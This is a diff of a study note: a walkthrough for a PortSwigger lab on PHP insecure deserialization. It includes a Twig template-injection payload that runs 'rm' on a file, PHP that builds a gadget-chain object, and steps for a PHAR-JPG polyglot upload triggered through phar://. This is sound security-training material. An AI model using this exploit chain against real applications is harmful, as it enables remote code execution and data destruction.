TheWhiteFluid/Obsidian_Cyber/CyberSecurity/AppSec/PortSwigger/Insecure deserialization.md

 **Analysis**:
 1. Observe that the website has a feature for uploading your own avatar, which only accepts `JPG` images.
 Upload a valid `JPG` as your avatar.
 Notice that it is loaded using `GET /cgi-bin/avatar.php?avatar=wiener`.
 2. In Burp Repeater, request `GET /cgi-bin` to find an index that shows a `Blog.php` and `CustomTemplate.php` file.
 Obtain the source code by requesting the files using the `.php~` backup extension.
 3. Study the source code and identify the gadget chain involving the `Blog->desc` and `CustomTemplate->lockFilePath` attributes.
-4. Notice that the `file_exists()` filesystem method is called on the `lockFilePath` attribute.
+Notice that the `file_exists()` filesystem method is called on the `lockFilePath` attribute.
-5. Notice that the website uses the Twig template engine.
+4. Notice that the website uses the Twig template engine.
 You can use deserialization to pass in an server-side template injection (SSTI) payload.
 Find a documented SSTI payload for remote code execution on Twig, and adapt it to delete Carlos's file:
     `{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}`
-6. Write a some PHP for creating a `CustomTemplate` and `Blog` containing your SSTI payload:
+5. Write a some PHP for creating a `CustomTemplate` and `Blog` containing your SSTI payload:
-    `class CustomTemplate {} class Blog {} $object = new CustomTemplate; $blog = new Blog; $blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; $blog->user = 'user'; $object->template_file_path = $blog;`
+    ```php
+    class CustomTemplate {}
+    class Blog {}
+    $object = new CustomTemplate;
+    $blog = new Blog;
+    $blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';
+    $blog->user = 'user';
+    $object->template_file_path = $blog;
+    ```

-7. Create a `PHAR-JPG` polyglot containing your PHP script.
+6. Create a `PHAR-JPG` polyglot containing your PHP script.
 You can find several scripts for doing this online (search for "`phar jpg polyglot`").
 Alternatively, you can download our [ready-made one](https://github.com/PortSwigger/serialization-examples/blob/master/php/phar-jpg-polyglot.jpg).
-8. Upload this file as your avatar.
+7. Upload this file as your avatar.
-9. In Burp Repeater, modify the request line to deserialize your malicious avatar using a `phar://` stream as follows:  `GET /cgi-bin/avatar.php?avatar=phar://wiener`
+8. In Burp Repeater, modify the request line to deserialize your malicious avatar using a `phar://` stream as follows:  `GET /cgi-bin/avatar.php?avatar=phar://wiener`

 **Workflow**: